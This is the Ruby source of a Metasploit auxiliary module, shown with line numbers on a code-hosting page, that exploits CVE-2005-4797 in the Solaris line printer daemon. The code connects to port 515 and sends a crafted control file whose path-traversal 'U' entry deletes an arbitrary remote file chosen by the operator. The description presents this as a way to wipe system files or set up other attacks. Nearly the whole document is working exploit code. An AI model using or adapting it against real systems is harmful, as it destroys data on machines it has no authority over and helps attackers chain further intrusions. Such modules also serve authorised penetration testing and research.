Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Solaris LPD Arbitrary File Delete',
13
      'Description'    => %q{
14
        This module uses a vulnerability in the Solaris line printer
15
        daemon to delete arbitrary files on an affected system. This
16
        can be used to exploit the rpc.walld format string flaw, the
17
        missing krb5.conf authentication bypass, or simply delete
18
        system files. Tested on Solaris 2.6, 7, 8, 9, and 10.
19

20
      },
21
      'Author'         => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'CVE', '2005-4797' ],
26
          [ 'BID', '14510' ],
27
          [ 'OSVDB', '18650' ]
28
        ]
29
      ))
30

31
      register_options(
32
        [
33
          Opt::RPORT(515),
34
          OptString.new('RPATH', [ true, "The remote file path to delete"]),
35
        ])
36
  end
37

38
  def run
39

40

41
    r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)
42
    r_user     = Rex::Text.rand_text_alpha(rand(8)+1)
43
    r_spool    = Rex::Text.rand_text_alpha(rand(8)+1)
44

45
    # Create a simple control file...
46
    control = "H#{r_hostname}\nP#{r_user}\n";
47

48
    # The job ID is squashed down to three decimal digits
49
    jid   = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
50

51
    # Establish the first connection to the server
52
    sock1 = connect(false)
53

54
    # Request a cascaded job
55
    sock1.put("\x02#{r_hostname}:#{r_spool}\n")
56
    res = sock1.get_once
57
    if (not res)
58
      print_status("The target did not accept our job request command")
59
      return
60
    end
61

62
    # Theoretically, we could delete multiple files at once, however
63
    # the lp daemon will append garbage from memory to the path name
64
    # if we don't stick a null byte after the path. Unfortunately, this
65
    # null byte will prevent the parser from processing the other paths.
66
    control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"
67

68
    dataf = Rex::Text.rand_text_alpha(100)+1
69

70
    print_status("Deleting #{datastore['RPATH']}...")
71
    if !(
72
        send_file(sock1, 2, "cfA" + jid + r_hostname, control) and
73
        send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)
74
      )
75
      sock1.close
76
      return
77
    end
78

79
    print_good("Successfully deleted #{datastore['RPATH']} >:-]")
80
    sock1.close
81
  end
82

83
  def send_file(s, type, name, data='')
84

85
    s.put(type.chr + data.length.to_s + " " + name + "\n")
86
    res = s.get_once(1)
87
    if !(res and res[0] == ?\0)
88
      print_status("The target did not accept our control file command (#{name})")
89
      return
90
    end
91

92
    s.put(data)
93
    s.put("\x00")
94
    res = s.get_once(1)
95
    if !(res and res[0] == ?\0)
96
      print_status("The target did not accept our control file data (#{name})")
97
      return
98
    end
99

100
    print_status(sprintf("     Uploaded %.4d bytes >> #{name}", data.length))
101
    return true
102
  end
103
end
104

105